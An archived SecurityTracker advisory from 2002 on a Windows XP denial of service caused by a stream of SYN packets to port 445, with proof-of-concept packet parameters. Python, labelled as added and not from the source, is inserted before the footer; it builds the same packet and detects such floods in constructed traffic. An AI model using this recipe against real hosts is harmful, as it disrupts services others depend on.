SecurityTracker.com

SecurityTracker Archives

Category:   OS (Microsoft)  >   Windows TCP/IP Stack
Vendors:   Microsoft
Windows XP Networking Port May Allow Remote Users to Deny Service By Sending a Stream of TCP SYN Packets
SecurityTracker Alert ID:  1003589
SecurityTracker URL:  http://securitytracker.com/id/1003589
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 19 2002
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A denial of service vulnerability was reported in Windows XP. A remote user can cause denial of service conditions on the target system.

A remote user can reportedly send a stream of packets with only the TCP SYN flag set to port 445 (the Microsoft-DS/SMB port) on a Windows XP host to cause the target to consume all available CPU. The reporter states this was tested with 3000 packets sent one after another at an upload rate of 20K [presumably 20 KBytes per second]. CPU utilization reportedly reached 100% within 20 seconds of the start of the stream, preventing other tasks from running until the packet stream stopped. Packets with flags other than SYN, and the same stream aimed at other default ports, reportedly did not produce the effect.

It is reported that this port is open by default on a fresh Windows XP installation.

Impact:   A remote user can cause a denial of service condition.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Exception handling error
Underlying OS:  Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  Windows XP Remote DOS attacks with SYN Flag. Make CPU 100 %


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                           .---------------.
                          / NtWaK0 Advisory \
+-----------------------------------------------------------------------.
                                                                        :
Affected         : Windows XP default install with TCP 445 open         :
Type             : Remote DOS attacks with SYN Flag. Make CPU 100 %     :
Date             : 15-02-2002                                           :
Author           : NtWaK0 @ www.SafeHack.com                            :
+-----------------------------------------------------------------------.
                                                                        :
+----------------.
 Remote/Local DOS \
+------------------`----------------------------------------------------.
                                                                        :
+-----------.                                                           :
 Disclaimer  \                                                          :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on        :
experiments though it may be false. The opinions expressed in this      :
advisory and program are my own and NOT of any company.                 :
In fact I do not work for anyone at the present time.                   :
                                                                        :
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are     :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone   :
does with this information. So, don't shoot the messenger.              :
Remember: Use a computer in ways that ensure respect for your fellows.  :
                                                                        :
+-------.                                                               :
 T.O.C.  \                                                              :
+---------`-------------------------------------------------------------.
                                                                        :
                                                                        :
   [  Brief History . . . . . . . . . . . . . . . . . . . . . .line 45 ]:
                                                                        :
   [  The Problem . . . . . . . . . . . . . . . . . . . . . . .line 58 ]:
                                                                        :
   [  The Solution . . . . . . . . . . . . . . . . . . . . . .line 130 ]:
                                                                        :
+-------------.                                                         :
 Brief History \                                                        :
+---------------`-------------------------------------------------------.
TCP/UDP port 445 is open by default on a freshly installed XP box.      :
The attack is serious since it works remotely and can make the CPU 100 %:
in less than 20 seconds.                                                :
To learn more about Windows XP please visit:                            :
http://www.microsoft.com                                                :
                                                                        :
YES YOU HAVE GUESSED IT ENGLISH IS NOT MY MOTHER LANGUAGE -:)           :
+---------------------------+                                           :
 >>> Test OS Applications <<<                                           :
+---------------------------+                                           :
Tested on Windows XP                                                    :
Default Install with default ports                                      :
                                                                        :
+-----------.                                                           :
 The Problem \                                                          :
+-------------`---------------------------------------------------------.
If an attacker targets your Windows XP port 445 TCP with some specially :
crafted packets [SYN flag set] they can cause 100 % CPU utilisation in   :
less than 20 seconds. The speed while sending the packet was 20 K upload:
sometimes less than 18 K [based on DU-Meter]                            :
                                                                        :
I have tried some other default ports with a similar attack but the CPU :
utilisation was normal, 9 % or 5 %.                                     :
                                                                        :
The target machine is a Windows XP with 240 RAM.                        :
                                                                        :
I tried sending packets with non-SYN flags: nothing happened. CPU OK    :
When I sent about 3000 packets NOT IN ONE SHOT... I was sending the     :
packets one after the other, I noticed that CPU utilisation jumped 100% :
                                                                        :
I couldn't do any TASK on the XP machine till I stopped sending packets.:
                                                                        :
I can see this as a serious problem if you are using Windows XP default :
                                                                        :
Imagine someone is attacking your Windows XP from 1000 zombies. I am    :
not sure if your Windows XP won't crash.                                :
                                                                        :
Like I said, I sent a couple of packets and the CPU jumped in less than :
20 Sec to 100 %. Soon I am going to do more tests to see what will      :
happen if I send the same packets but for one hour time or more.        :
                                                                        :
                                                                        :
+-----------------------------------------+                             :
>>> Proof-Of-Concept-Packet-Information <<<                             :
+-----------------------------------------+                             :
[IP]                                                                    :
SourceAddress=                                                          :
SourcePort=1                                                            :
DestinationAddress=                                                     :
DestinationPort=445                                                     :
HeaderSize=20                                                           :
SpecifyHeaderSize=0                                                     :
Identification=0                                                        :
SpecifyIdentification=0                                                 :
Checksum=0                                                              :
SpecifyChecksum=0                                                       :
TypeService=4                                                           :
FragmentationType=2                                                     :
DataSize=32                                                             :
Offset=0                                                                :
TTL=1                                                                   :
                                                                        :
[Commands]                                                              :
NbPackets=3000                                                          :
PacketType=0                                                            :
                                                                        :
[TCP]                                                                   :
fURG=0                                                                  :
fACK=0                                                                  :
fPUSH=0                                                                 :
fRESET=0                                                                :
fSYN=1                                                                  :
fFIN=0                                                                  :
Acknowledge=0                                                           :
Sequence=0                                                              :
Window=0                                                                :
Offset=0                                                                :
Urgent=0                                                                :
Checksum=0                                                              :
SpecifyTCPChecksum=0                                                    :
Data=xffxffxffxffxffxffxffxffxffffx00                                   :
                                                                        :
........................................................................:
........................................................................:
                                                                        :
+------------.                                                          :
 The Solution \                                                         :
+--------------`--------------------------------------------------------.
Vendor should be informed... I guess Microsoft reads SecurityFocus too  :
Filter 445 and other UNUSED ports. Stop unused services.                :
+-----------------------------------------------------------------------.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPG00kPPoW9fFNsN8EQIMcwCg4aNhkGYMIEDs4u+l3MCo5BMZKrcAn17B
fd1j/WRgYSqj/B4AkiohkXNz
=jwkR
-----END PGP SIGNATURE-----

________________________________________________________________________
"The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good  www.SafeHack.com                         |
Je Pense, Donc Je Suis                                    \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :)    --(")--
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in ways that ensure respect for your fellows      -=-
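The Proof-Of-Concept-Packet-Information listing in the advisory above is a parameter dump for a packet-crafting tool, not runnable code. The Python below is an added example (not code from the advisory, from NtWaK0, or from SecurityTracker): it serialises a TCP segment with the same field values (source port 1, destination port 445, TTL 1, TOS 4, SYN only, sequence 0, window 0, 32 bytes of data), parses it back with checksum verification, and runs a per-source sliding-window rate check over a constructed stream shaped like the reported test (3000 SYNs over 20 seconds) next to a legitimate client. The hosts 10.0.0.7 (sender), 10.0.0.9 (legitimate client) and 10.0.0.20 (target), the reading of the garbled Data field as 31 bytes of 0xff plus one 0x00, and the reading of FragmentationType=2 as the Don't Fragment flag are assumptions. Nothing is put on the wire. Two points a reviewer of the PoC would note: TTL=1 means any router discards the datagram at the first hop, so as listed the test only reaches a host on the same link; and a SYN with window 0, source port 1 and a 32-byte payload is unusual enough that a detector can key on those values as well as on the raw rate.

```python
import socket
import struct
from collections import defaultdict, deque

IPPROTO_TCP = 6
TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK, TCP_URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
IP_DONT_FRAGMENT = 0x2  # assumption: the tool's "FragmentationType=2" is taken to mean DF set

# Data field of the PoC listing, read as 31 bytes of 0xff followed by one 0x00 so that it
# matches DataSize=32 (an assumption about the tool's garbled "xff...xffffx00" notation).
POC_PAYLOAD = b"\xff" * 31 + b"\x00"


def checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of big-endian 16-bit words, folded, inverted."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_segment(src_ip, dst_ip, sport=1, dport=445, ttl=1, tos=4, ip_id=0,
                  flags=TCP_SYN, seq=0, ack=0, window=0, payload=POC_PAYLOAD):
    """Serialise an IPv4 datagram carrying one TCP segment, both checksums filled in.
    Defaults mirror the [IP]/[TCP] values of the PoC listing: SourcePort=1,
    DestinationPort=445, TTL=1, TypeService=4, fSYN=1 only, Sequence=0, Window=0."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    tcp_len = 20 + len(payload)
    # data offset = 5 words (no options), reserved 0, checksum 0 for now, urgent pointer 0
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, IPPROTO_TCP, tcp_len)
    tcp_csum = checksum(pseudo + tcp_hdr + payload)
    tcp_hdr = tcp_hdr[:16] + struct.pack("!H", tcp_csum) + tcp_hdr[18:]
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 20 + tcp_len, ip_id,
                         IP_DONT_FRAGMENT << 13, ttl, IPPROTO_TCP, 0, src, dst)
    ip_hdr = ip_hdr[:10] + struct.pack("!H", checksum(ip_hdr)) + ip_hdr[12:]
    return ip_hdr + tcp_hdr + payload


def parse(packet: bytes) -> dict:
    """Decode the fields a detector needs and verify both checksums (a sum of 0 = intact)."""
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    ttl, proto = packet[8], packet[9]
    tcp = packet[ihl:total_len]
    sport, dport, seq, ack, off, flags, window = struct.unpack("!HHIIBBH", tcp[:16])
    pseudo = struct.pack("!4s4sBBH", packet[12:16], packet[16:20], 0, proto, len(tcp))
    return {
        "src": socket.inet_ntoa(packet[12:16]), "dst": socket.inet_ntoa(packet[16:20]),
        "ttl": ttl, "sport": sport, "dport": dport, "flags": flags, "window": window,
        "payload_len": len(tcp) - (off >> 4) * 4,
        "ip_csum_ok": checksum(packet[:ihl]) == 0,
        "tcp_csum_ok": checksum(pseudo + tcp) == 0,
    }


def detect_syn_flood(stream, port=445, threshold=100, window_s=1.0):
    """Sliding-window rate check: one alert per source that sends more than `threshold`
    SYN-only segments (SYN set, ACK clear) to `port` within any `window_s` seconds.
    `stream` yields (timestamp_seconds, raw_ipv4_packet) pairs in time order."""
    recent = defaultdict(deque)   # src -> timestamps of its SYNs still inside the window
    alerts = {}
    for ts, raw in stream:
        p = parse(raw)
        if p["dport"] != port or (p["flags"] & (TCP_SYN | TCP_ACK)) != TCP_SYN:
            continue
        q = recent[p["src"]]
        q.append(ts)
        while ts - q[0] > window_s:
            q.popleft()
        if len(q) > threshold and p["src"] not in alerts:
            alerts[p["src"]] = {"src": p["src"], "first_seen": q[0], "at": ts,
                                "syns_in_window": len(q), "ttl": p["ttl"],
                                "sport": p["sport"], "window": p["window"]}
    return list(alerts.values())


def constructed_stream():
    """Constructed sample traffic, not a capture: the PoC's 3000 SYNs from one host
    spread over 20 seconds (about 150 per second), plus a legitimate client on
    another host that opens three connections with ordinary TTL and window values."""
    events = [(i * 20.0 / 3000, build_segment("10.0.0.7", "10.0.0.20")) for i in range(3000)]
    for i in range(3):
        t = i * 5.0
        events.append((t, build_segment("10.0.0.9", "10.0.0.20", sport=1025 + i, ttl=128,
                                        seq=1000 + i, window=65535, payload=b"")))
        events.append((t + 0.01, build_segment("10.0.0.9", "10.0.0.20", sport=1025 + i,
                                               ttl=128, flags=TCP_ACK, seq=1001 + i, ack=1,
                                               window=65535, payload=b"")))
    events.sort(key=lambda e: e[0])
    return events


if __name__ == "__main__":
    pkt = build_segment("10.0.0.7", "10.0.0.20")
    print(len(pkt), "bytes (IP + TCP + data):", parse(pkt))
    for alert in detect_syn_flood(constructed_stream()):
        print("ALERT possible SYN flood:", alert)
```

Running the file prints the decode of the 72-byte datagram and one alert for 10.0.0.7; the legitimate client's three SYNs never trip the check. The threshold and window are tunables chosen here, not values from the advisory; what the sliding window buys is that the reported pace (about 150 SYNs per second from one source) is caught within the first second of the stream rather than after the 20 seconds it took the CPU to saturate.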

 
 



Copyright 2019, SecurityGlobal.net LLC